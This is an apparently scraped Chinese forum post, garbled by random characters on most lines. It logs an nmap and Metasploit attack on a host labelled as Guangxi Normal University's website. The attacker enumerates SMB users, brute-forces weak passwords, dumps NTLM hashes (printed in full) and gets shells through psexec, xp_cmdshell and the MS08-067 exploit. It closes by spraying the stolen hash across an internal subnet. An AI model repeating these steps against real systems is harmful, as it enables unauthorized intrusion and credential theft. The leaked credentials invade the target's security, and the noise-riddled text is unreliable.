广西师范网站http://202.103.242.241/3 y( i/ t7 ?+ m1 q3 ~
0 ^. q6 \$ I0 K: J. ^root@bt:~# nmap -sS -sV 202.103.242.241* Z' _; K" m: a7 d: o2 u' ~
* v, v( w( s: x) W* a, H; _
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST' @6 d1 P1 L I- g
4 ?& K7 j) i" `7 D# U: rNmap scan report for bogon (202.103.242.241)
$ c* x+ y! n6 V! v5 @. Z ?- f* K( r: r% V
Host is up (0.00048s latency).9 _2 N) n& {* X2 o. l" q
: h- [+ }9 K' [+ ~6 f/ L8 KNot shown: 993 closed ports
/ t# d: |4 W. ~
; B4 {- R( @4 \+ W' VPORT STATE SERVICE VERSION5 W" ?0 a8 A2 z- q& W( r
2 Z) S0 _4 Q ?8 E6 ~7 T: m7 b( W9 b135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
2 H8 W2 K1 ?# L( D; f& f2 L9 @! ?! f% B) ]5 G# J
139/tcp open netbios-ssn
$ s- u/ M8 F$ r$ B
" n7 Z0 R/ ~3 n1 P* t# \445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
" y9 ^: {1 E5 l9 I! f9 s8 t
' d0 D. v( r, K, A: X& e1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)5 \ l* R* @ ~ c
( @( M% p# K6 p! x/ g, A1026/tcp open msrpc Microsoft Windows RPC# S$ `6 J- z- N9 F
& o, y H2 b2 j5 I3372/tcp open msdtc?
. ]# C- m9 J) q3 x- ~$ t" J3 o4 Q' y+ t8 g
3389/tcp open ms-term-serv?, c6 W Y, H9 ]3 `: p% t/ A# k
1 }6 D" \# s& O' m% Q* U0 Q
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
1 e$ B O& }& b0 [7 uSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r3 u% l5 h$ E# g+ [- u; q
1 K* e: E, z# v* e8 ?9 x& u$ Q
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions% ]% d& R% x4 d6 S( O' \+ A
7 q+ @$ K, K* W" p$ t" ~
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
- s6 @( Z- k/ F4 `5 {3 g1 Q$ }; U' r- u+ O8 l' n) s1 c
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO2 `- C* T4 r! T" b" C" x' _4 s3 Q
9 G* d- X) p* \SF:ptions,6,”hO\n\x000Z”);
2 e7 W" o# Z% U- p8 L) ^
( F1 x; a! k; M1 C* ~7 g1 KMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
0 H; } h; U* } e1 E' N' L1 i" M5 y% e/ M2 R) D1 ^
Service Info: OS: Windows R- j. S4 ]; S5 m# j8 o2 Y8 j8 r
7 u; R3 a. W) F* s
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
* f! e" J$ b$ f0 f5 V+ U, l0 s% G( h+ N5 R( e6 H1 q* F
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds/ Y+ Y: a: y, Q- k! d, h* c
* L' K" k5 E, g% T. Y G: y# Qroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
5 \/ Z. u3 A5 K, K6 q3 Z. P: b+ z) u; b- p( T
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse6 \* }3 f, Z3 g7 e3 Z
$ r3 m7 {, B$ q. S3 ~ m+ u3 p7 O
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse8 z- l% k/ a' y
) p1 a+ A; e0 M4 r, j1 R
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse/ k9 Y9 m. u3 v+ @/ Y# c. K
* | `$ \2 e0 Y2 X0 D$ k+ k-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse1 G2 [, v0 V j F+ U# v8 Q, H$ c
, S6 c" _% x$ m! V
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse, V4 c3 ?9 N/ W2 N3 H. i
4 s7 J- ^- t& i! D
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse, L: v5 v, j- J- h
0 q6 a- `- H, O+ G/ z-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse' A" t! V5 |; Y, d; `" ^( ^
2 k, {+ j; U2 m" ]' o; V, Q
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
: S" Y* Y: W5 I/ Q6 I u2 \; K. ] z* w! t/ @
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
0 S5 `7 ?& J, t% j% p/ [
# t- R3 f% b. I2 G3 t/ L-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
* o8 P- D$ b5 \9 G7 {( b8 P
% I! _$ A7 C7 c3 Q& U, o5 Z-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse: {3 d9 X6 f7 K- Q; Y4 F: F$ o
5 w; r* I( h3 o" }- X5 K
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse: Y# h) E$ u3 K
}, r+ w# \( N+ k2 l7 Q8 }-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
' i. p# ?8 ~8 R8 M
' x! k5 b# F3 X-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
- i# C( U* n! F
: m: G3 b: n9 S" Q-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse7 `* J! H) C* Q% y; z
5 H+ e7 d2 K4 H* c# j- Mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 4 F! o4 {1 \! |: x
3 x) S8 m8 \9 t8 X. p; C//此乃使用脚本扫描远程机器所存在的账户名
Y8 d' L( n2 ^' l
\3 n" N( \2 i* H3 Z0 l2 p! LStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST* U! ~7 D0 S7 Q# |
; L% r5 x. b+ M
Nmap scan report for bogon (202.103.242.241)% E( L! d- A' q2 E
; {/ T0 }+ h' k2 R5 ?: q+ E* _4 iHost is up (0.00038s latency).' R: y# `" x: \
4 R- ~: b; n* G$ S$ K5 l! c# o
Not shown: 993 closed ports% J4 T7 @% k" \& e
% \, [2 s% S K5 O1 LPORT STATE SERVICE
8 ~/ m9 ~+ C/ j; C" X6 `3 E- p7 B
% r" j! E3 R& e$ [135/tcp open msrpc
/ Y0 W8 r) A& t* t+ [$ b
# K- `% u1 i2 q9 N3 y) f139/tcp open netbios-ssn7 [( k& o7 W- |/ N$ ?
2 c% P9 _5 o# i; V
445/tcp open microsoft-ds
! G* O6 e& [7 y: | \! v$ B9 Y) L1 e* k6 Y
1025/tcp open NFS-or-IIS
. T; f4 q5 X* \! k
6 |/ [ s( S$ h+ i2 F- l) E$ F' w5 y1026/tcp open LSA-or-nterm
M, I/ J& _3 X" E# {
. h' O _; y/ @+ F4 @7 I$ B5 |3372/tcp open msdtc
k2 f8 r+ W& k A. c J9 w
$ u5 N) P& I2 U) T M3389/tcp open ms-term-serv
% C% \6 e6 N. r; P; g5 `# j* {
n. S5 u% V6 \" FMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
2 g' O" A% m( Z* p1 h E$ y
. M4 ~( E2 p. B- G2 h# @Host script results:
3 [$ X, x1 Q# |6 _- C& w: w& m! _8 Z U7 q7 `/ v" U8 I! o
| smb-enum-users:
. A2 R+ ^6 e! Q/ E% X5 ]
- K4 Y/ X8 ~' k; J# X6 J|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果& s. b) A9 m4 h4 ~. D- z& J! f/ E
" e) g# @/ x. S0 B( q9 W4 XNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
' m0 o) n; i9 f! @, ~. v2 l. E$ Q4 f( |. O/ ?/ e$ o* ]
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
, g7 k7 Y- J( _$ D4 \% U! m+ t: A2 M: t; a% g* b
//查看共享
+ ]' o; b+ D/ m/ m% n6 k/ V
, J' J: w% r; L1 U% H) f8 NStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
$ N+ y2 \" f$ T! }) b5 `# s0 ], ]( g, C) O
Nmap scan report for bogon (202.103.242.241)
8 C1 R0 y9 G' G- y$ q, R" X6 x1 O# v' O& i+ _
Host is up (0.00035s latency).
4 K. X& o, [3 }2 ~0 Q3 L5 i, R* k7 L$ V) b
Not shown: 993 closed ports
& r( p8 r2 b. w& @3 {4 S7 z) m4 }3 ~0 x
PORT STATE SERVICE
( s, ]2 S& }( x# `8 `, T# R
& o' }/ F' d1 Y$ y* ?9 N" `135/tcp open msrpc' @: c1 }! L7 I: C5 A, I T! y5 A" e: m
& Q2 n' @. q4 P+ \0 U: G0 r% N
139/tcp open netbios-ssn
! V- p% Q+ f$ B% }8 R+ f: Q
' n4 e8 i! V E6 o' |445/tcp open microsoft-ds) R; s. ^+ p3 w2 g+ p
, Q7 ^% }$ q# i1025/tcp open NFS-or-IIS% I: ^" ~2 _. F+ x( u( M( c
2 @" f8 d* ~! P3 w" }
1026/tcp open LSA-or-nterm3 g+ h3 K6 U# r3 c' u, Z
: R% a. y) Q: s# A, ~- ^+ q, n
3372/tcp open msdtc
2 \- c4 q$ g6 }8 |: a
! P& a0 n1 {, B( k- E3389/tcp open ms-term-serv0 X5 \8 ~- j: L
( D3 u/ w' }9 ~' N$ X* R+ @) J* F
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems). h6 ?9 x- a, B) W
2 @7 G2 m; S" n% Q. n8 V# d' i5 ?
Host script results:
- {' F" |. r; o" y8 T7 D. ~' h7 ^% U1 w( g
| smb-enum-shares:
9 X) M6 M4 Y* [$ ~' s/ m0 g& a; E$ y* N
| ADMIN$
( k* |- J- K, Q3 u& g
! a1 R; ~5 L* u| Anonymous access: <none>
0 K$ j8 |% B/ W0 |- y2 a! q/ I; d" |+ S
| C$8 Q4 R# Q; {; w9 H9 j
0 o1 `7 b7 I2 [" |9 Z r
| Anonymous access: <none>
# q$ B! B# ^. c( Z4 d3 q
' x$ {6 `% M7 a/ L| IPC$& E) M+ Z: R) H
" F6 n# [0 o+ M7 Z0 b( v. i|_ Anonymous access: READ
/ r3 j% h7 A ^8 R1 k# a8 W9 D1 R" x, T5 u& |4 w1 d
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds. r# e" F3 c* @) W
! g* d5 j9 L$ n( L& K$ V" M
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
( Z- F9 g/ l% z" C" E
" `( }" m2 L, f& ]//获取用户密码
4 i$ O2 S2 V: y X! C
7 k. {1 m6 n( i1 {Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST, `1 f+ p! b) n. {; Y( r4 w
% d ?) w: G+ E# u# |( A, Y! ?
Nmap scan report for bogon (202.103.242.2418)1 `& F& j! k6 U$ @
$ v; V' h' o* A5 j- hHost is up (0.00041s latency).
1 ]/ c7 k* a$ J9 e0 v
4 I# j3 w5 b& b" w! w8 z- ~Not shown: 993 closed ports
3 y, J7 O0 ^6 I; ^# C/ ?
v- k0 b& I9 q R( |3 E' d; ^PORT STATE SERVICE
# ^4 F+ M7 D& U" c9 w7 z& Z. O+ A9 I) ^$ S2 D9 R
135/tcp open msrpc
3 D6 V" z# N2 d t+ [3 D! |9 O7 i" S- U4 j
139/tcp open netbios-ssn
) ?6 G- B& B6 B* E9 k1 Z+ v3 g# ^/ x! O, x8 X1 o
445/tcp open microsoft-ds
" h) j8 P+ G- W
0 D" o. d) l) g# q D1025/tcp open NFS-or-IIS+ j7 K7 K0 E% i) S8 |7 [
* Z* R0 v" [ c; G$ l8 x1026/tcp open LSA-or-nterm# V- t8 I: x l* k
0 R# _9 M! k+ q# P2 t3372/tcp open msdtc
! Q j' s: `' q. n. \' v$ o
) I& {+ r( u B+ N7 g( M/ A! Q$ [% O3389/tcp open ms-term-serv
" `/ g! T& A" i/ g. p
/ F( }+ s2 R6 v# E, H* O6 AMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)" y' b: p$ u& V I- A3 ~
% K/ E+ ~+ k. J% X6 w Q
Host script results:3 z3 H7 v& Y6 M6 B
8 j: L4 ]: @, K' W, [| smb-brute:6 J* z& T3 p7 D+ D; u
( l6 [( ], k- N5 _; W
administrator:<blank> => Login was successful
- V! s0 }6 X2 z: d- N9 m/ V- o8 N
0 L/ [. _# I4 A. B% m M, c- N0 F|_ test:123456 => Login was successful
7 K7 Y2 i2 M) R: c; o5 u8 P& B$ a9 N
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
. v9 ]! [0 v3 f3 ^/ J4 ^4 I) ]" t3 K/ Q9 e; f& r
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash/ N* D; m6 u% W* H" R4 e
& c0 C! w; j; q7 n% O
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
! F* V' R! K9 ~; B2 e- U0 ~3 s, b$ W ]7 o0 o0 e, ?$ `) Q- X
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse1 K4 X- u y3 }
8 Q2 j* L! }2 {; M
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139: w2 x: \) H( {( y5 ~1 |
0 U1 f# g- @3 w$ J7 Z
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
# ?1 g3 C- c( B) E
$ o0 X; f: o4 h3 dNmap scan report for bogon (202.103.242.241)
# n7 @8 e6 J! R$ Q9 a4 s, C! C* \$ S/ n e: M3 r* G8 G
Host is up (0.0012s latency).2 B4 m0 o" F. n" @' r! Y/ [. H2 l
2 @$ ~% T. A* L% M6 X" X
PORT STATE SERVICE
; q% D& |) U1 M6 z3 {) N
: ]: T0 k( m9 {0 B5 q2 m W t135/tcp open msrpc
" c' X! z# A: \; k+ z- l: l- T `+ x' T! c T, X( G. r @
139/tcp open netbios-ssn. K* y/ \" R0 u* Z
. z& T# Y0 S2 o* s
445/tcp open microsoft-ds& J# o3 g# c( `
$ } P; i( R3 m+ z& _2 o
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)6 X0 d- b. |2 g I
/ v* V2 r! j6 e& mHost script results:3 e& ^, t- L/ S( z( m
6 t5 k: ?! {+ [3 I5 U
| smb-pwdump:
1 q4 u( `; t4 {6 T$ _# n& C* k" E9 l$ }; h. G# S7 t# ?
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
$ ^% [' W; X) f
, X7 ?9 s) d3 o8 c1 T( i8 C) d| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
8 V9 O; `5 x$ b2 m, n; L8 i, k, v6 A% \" y. s! D. S9 I2 O+ h& d' W
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
! W/ j, o2 {9 [' N- t3 F9 p# D' U! m) _. K
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2- I+ t1 u& {" L
$ p) G0 {; j- _3 INmap done: 1 IP address (1 host up) scanned in 1.85 seconds
6 ]6 p0 l d' M' u1 Q' c0 }5 b) I/ s
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell) }3 W& s4 ?; u4 \5 u
7 Z/ y# h2 e% J-p 123456 -e cmd.exe2 Q( {# B4 C2 u: o* F" S i- H N* O7 @
; Q5 _0 {! k% p: J" ], P
PsExec v1.55 – Execute processes remotely* V3 n1 ~* r% t+ j9 n
, X6 K6 ~( u% O
Copyright (C) 2001-2004 Mark Russinovich/ P( y2 l* z# N. G
. n5 R; H8 N7 g# [' L6 h [3 z8 \, z7 |
Sysinternals – www.sysinternals.com
, l1 Y7 l( e( {, l: g; m3 [3 x4 Y, x
Microsoft Windows 2000 [Version 5.00.2195]; L* G0 K" m; o, g; b
8 J& |3 f# X+ m. B
(C) 版权所有 1985-2000 Microsoft Corp.
2 z8 ~/ U* a5 k2 @. H6 w0 j+ Q- A5 A9 W- _0 R/ V+ R# L8 ?
C:\WINNT\system32>ipconfig( h1 o, R! g3 Q! r+ p: E, Z7 J: b
' Y+ h6 F% }6 W' K. r
Windows 2000 IP Configuration
$ S6 A7 p8 Z4 d0 u, \9 |2 H. ]% O t0 ~2 }( z$ D& ?
Ethernet adapter 本地连接:1 R" m$ m6 x) L0 S
( |; m' r2 T2 H* T6 Q" OConnection-specific DNS Suffix . :
, ]* S2 j5 c3 L4 }) I* p2 P: N' y# T% Y6 H0 _# ?# Q
IP Address. . . . . . . . . . . . : 202.103.242.241
' ]1 F2 V- o' M; z* D4 r# s" s$ f% } R* A8 |6 L' F3 T+ Q
Subnet Mask . . . . . . . . . . . : 255.255.255.0
, E6 y2 B) b( {$ K. h/ c
0 p+ V: v& k7 K( I) `Default Gateway . . . . . . . . . : 202.103.1.1. G1 M. N0 Q! i4 M9 C' k* H& o: M
; }. f) [2 G% L7 q
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令$ r$ e9 _, F& `: H& M& m: G0 z
1 A# ]2 o! H% Mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞' C' U$ Q ]; r2 s
# |5 Z3 x( Z7 f2 {. EStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST+ [' U& C7 B- R3 E' ?$ k
9 C0 F8 A9 o8 `% H% J( H
Nmap scan report for bogon (202.103.242.241)
' q: {* z8 N3 d2 t! f6 P* R' L0 p% o j; V: ]
Host is up (0.00046s latency).
, Z1 A9 }6 X/ ~; O( q6 c
7 ]7 p' [' }3 n. u4 g8 x; `- F( Q# lNot shown: 993 closed ports3 X. w. U2 r! U& L! k
- @# r/ Y( H% a9 U/ P6 I& r! b
PORT STATE SERVICE
5 u, d% i8 ?! V8 R. \ Z' f: z! l- S: V" m
135/tcp open msrpc
, ?. U5 r0 D+ i
: }. K, T- w: R3 W" k7 j! ^2 I139/tcp open netbios-ssn
6 K8 N, b1 s: F7 Q1 M$ `- H
* l9 o& a& Q- j A445/tcp open microsoft-ds
; K; @6 F m8 v0 v7 u9 {7 s) b" a4 V8 I
1025/tcp open NFS-or-IIS- z" R: l2 @1 x
0 z7 X: ]: ~0 o8 s
1026/tcp open LSA-or-nterm
9 L' k6 L1 D) y8 q* a1 ]2 V
9 y4 \6 y+ _6 [7 x0 E3372/tcp open msdtc1 L( D" N" y" W4 v. Z
$ V2 C# `8 k+ B4 L$ _3 A5 A; ~
3389/tcp open ms-term-serv8 ^" C2 t `9 [) I
0 ~- t! V3 t* N- y' ?
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)5 T0 q/ [$ n. f Y! k5 q
6 @* I, q+ y7 h$ T1 B" AHost script results:
, o: H5 O( i1 j3 I
& z; Q+ C& ]8 i! O% H$ f| smb-check-vulns:
: O7 E9 _* j; _" Y9 N* E6 F* r( _7 h9 v
|_ MS08-067: VULNERABLE
9 p2 o. [; b6 B! p) b$ m# u% P+ D8 O2 O# d6 T' ~; W! a
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
5 m& h c# y; M6 Y* I1 @% q7 z: D7 ^0 C$ j1 v
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出; Z2 O: l2 O8 M! h/ [9 D
6 J# v/ m" l+ P
msf > search ms08
, u' m8 r+ o- N! j) [1 D
! c" X) P- w$ z- J' {- G8 E imsf > use exploit/windows/smb/ms08_067_netapi
, e) J) ] n B; J. W- t0 O
: v) N# E/ F/ @% ~) Tmsf exploit(ms08_067_netapi) > show options7 \/ n" z2 Y6 U& B+ f- D, e
# i3 \, M! ~2 o! E/ X) x& z
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241' F5 d. P; q3 P1 n2 @& o9 h u
7 d1 N4 T4 P) [$ ^
msf exploit(ms08_067_netapi) > show payloads
: U; i @% y" J2 ^" `8 T( G) S6 @1 V A! N
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp& [7 P5 ~. E) P: h2 e
t7 w. M2 S( t. f) Jmsf exploit(ms08_067_netapi) > exploit' U" b& e5 d$ n. l+ z" T
* u2 ]9 S& ]: M5 `4 Ymeterpreter >
' J7 U& Q/ v$ t, w- p
* m1 f& g l( R% |. SBackground session 2? [y/N] (ctrl+z). r$ x, J- {. z5 l' Y8 v
9 S3 s( H0 e0 k' y" T3 P) K k5 gmsf exploit(ms08_067_netapi) > sessions -l* h+ h1 A; e% {! w3 _
- M+ W: U: ^* Troot@bt:/usr/local/share/nmap/scripts# vim usernames.txt8 h1 P3 L! D- o) K+ s
4 s- Z; y* ?& H$ c( p/ d; s& Atest+ ^: i6 Q2 H# A; P% D
c, R& G+ Z; C: Y" K9 R; W4 Radministrator
7 _) [% }; Q P, `2 F9 L- X. s- L6 r; _/ E" O6 ?
root@bt:/usr/local/share/nmap/scripts# vim password.txt: b5 @6 Y1 [# G. u$ [$ ?, B, f9 A
, T9 @1 B" a) K$ \# A) f. m* Q0 A! _
44EFCE164AB921CAAAD3B435B51404EE y# v: z6 o7 w* Y; b
0 M. B8 f% ~3 }4 w% C! W* p3 O
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
" v. H9 ?; C$ B" Z/ }4 s* h6 k6 g5 p# D7 [- o" B
//利用用户名跟获取的hash尝试对整段内网进行登录
+ C1 m/ Z7 r/ C4 H8 g& ?% H
0 b) k9 V! B, Q6 [* Y7 [Nmap scan report for 192.168.1.105
. P) U e0 @9 f" N. M; d$ k) n, p5 d3 ?: V3 |
Host is up (0.00088s latency).! x: P7 ]4 }$ p- h
; T! X, R, Z5 tNot shown: 993 closed ports2 F+ p/ P) A5 d: N1 \
9 R2 g8 N; n9 @1 `5 Y9 L# y- q2 Z' `
PORT STATE SERVICE2 O: H% @) B4 ~8 q" i
4 Y# p, K1 x" y+ c* Q9 F9 Q( w135/tcp open msrpc% B$ q, i! u: m7 u+ j$ o" [1 Z
4 D! D6 |. C. Y$ C( K) E) m5 G
139/tcp open netbios-ssn/ ]+ Q: t7 n& _; T, |! j
, D' V8 i2 F/ R" }2 P4 {7 M
445/tcp open microsoft-ds" c+ U2 E4 d6 y
$ l" m9 `1 w& b# \. E i: D
1025/tcp open NFS-or-IIS' N/ ?- p9 A5 n4 M" d& u
/ q3 d1 X; {( I) K9 A; w
1026/tcp open LSA-or-nterm2 H) x0 T$ a: D' M
: o* h' F: b% O7 [ D, k: B$ c
3372/tcp open msdtc
V, ?! s, t0 l2 s; C0 B
" T9 I( O* x. U, U- {3389/tcp open ms-term-serv
- J9 D+ i9 l! R3 G6 N" e7 S+ F+ E$ a; ^" r; d# [( r) t5 e. e
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
# w3 u1 q/ T% z. @. f8 T( f3 h) I g1 X2 C6 D
Host script results:# p. f" i, K2 z, ~3 l4 U
, B" t& u/ y, U* F" w6 g1 F3 u k| smb-brute:
2 y2 Q4 p0 n* H8 ]! I; Y' B. s; Q! g4 e9 e
|_ administrator:<blank> => Login was successful6 p- J% b) U" T% s* T' {" t+ v
% r2 L2 G. z. x( f0 o s攻击成功,一个简单的msf+nmap攻击~~·' C) z3 J z( a
4 j E8 m8 E! A9 a* R
|